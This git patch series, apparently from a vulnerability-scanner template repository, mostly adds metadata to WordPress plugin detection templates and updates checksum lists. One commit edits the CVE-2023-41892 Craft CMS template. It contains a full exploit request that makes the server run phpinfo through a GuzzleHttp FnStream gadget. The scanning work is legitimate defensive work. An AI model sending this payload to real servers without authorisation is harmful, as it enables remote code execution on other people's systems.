diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 716c8ddfce8398640a77d772c49f51bab2abbb75 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 18 Sep 2023 15:17:31 +0530
Subject: [PATCH 0419/1090] updated matcher

---
 http/cves/2023/CVE-2023-41892.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml
index 205e4751c7..fe677be73f 100644
--- a/http/cves/2023/CVE-2023-41892.yaml
+++ b/http/cves/2023/CVE-2023-41892.yaml
@@ -32,11 +32,13 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpcredits"}}
+        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
 
     matchers:
       - type: word
         words:
           - "PHP Credits"
           - "PHP Group"
+          - "CraftCMS"
         condition: and
+        case-insensitive: true

From 1192399faa68c47a3b7726ae0eae9ee5529b6b38 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:49:01 +0000
Subject: [PATCH 0420/1090] Auto Generated New Template Addition List [Mon Sep
 18 09:49:01 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 7c9309fe60..90432fc2a0 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-22463.yaml
 http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-2813.yaml
 http/cves/2023/CVE-2023-30943.yaml
+http/cves/2023/CVE-2023-37629.yaml
 http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml
 http/cves/2023/CVE-2023-4714.yaml

From cf1bfc0b42aa1a76fdb7388cc89d22eb38588b2f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 09:49:09 +0000
Subject: [PATCH 0421/1090] Auto Generated Templates Checksum [Mon Sep 18
 09:49:09 UTC 2023] :robot:

---
 templates-checksum.txt | 405 +++++++++++++++++++++--------------------
 1 file changed, 203 insertions(+), 202 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 73710c3dec..b716fde233 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2626,6 +2626,7 @@ http/cves/2023/CVE-2023-37266.yaml:c0f54d30b78925c846255def26f14f293483af19
 http/cves/2023/CVE-2023-37270.yaml:0361d6f58d1acf558c8a09a28ba712cb3031ac52
 http/cves/2023/CVE-2023-37462.yaml:67ac93c0669b64df4ff514546fdbd7c90b8f66f1
 http/cves/2023/CVE-2023-37580.yaml:139acad84a77ceda7a4e60d9340744f1877e7730
+http/cves/2023/CVE-2023-37629.yaml:f6f835e4522893181b1911472a6ba973be73b43b
 http/cves/2023/CVE-2023-3765.yaml:ef8f8056df025f68a3937edf1e22c0192db14b5c
 http/cves/2023/CVE-2023-38035.yaml:633a5a3a093fdb6090aa7307129fd95fa9c1db0b
 http/cves/2023/CVE-2023-38205.yaml:218e5899c6a92dbdccfc85ea7c13426df25dc0f7
@@ -2685,7 +2686,7 @@ http/default-logins/druid/druid-default-login.yaml:18fd56a96ab97f885ef971464d3ca
 http/default-logins/dvwa/dvwa-default-login.yaml:95d70dd1e620a1940b4b791a16274eed352425c3
 http/default-logins/easyreport/easyreport-default-login.yaml:18a21a147e467f4605ff0f5f795476e7e616137e
 http/default-logins/elasticsearch/elasticsearch-default-login.yaml:d49f8887707fa02c05c5b4e1cd9987842eb7de8c
-http/default-logins/empire/empirec2-default-login.yaml:562054687357b8fbf7a7f3e1bed309ea3e6e7268
+http/default-logins/empire/empirec2-default-login.yaml:68c50d87f7c2a858e4b784ab960c022054189c4a
 http/default-logins/emqx/emqx-default-login.yaml:dfbe73effe5c64725f1e51e022bf71133d785b9f
 http/default-logins/esafenet-cdg-default-login.yaml:da757e9488437ecafc7bb2eb569f00a2086b22a2
 http/default-logins/exacqvision/exacqvision-default-login.yaml:3b9181a16d1bbb5e9ce716ac0662dedceacccdd4
@@ -5829,218 +5830,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
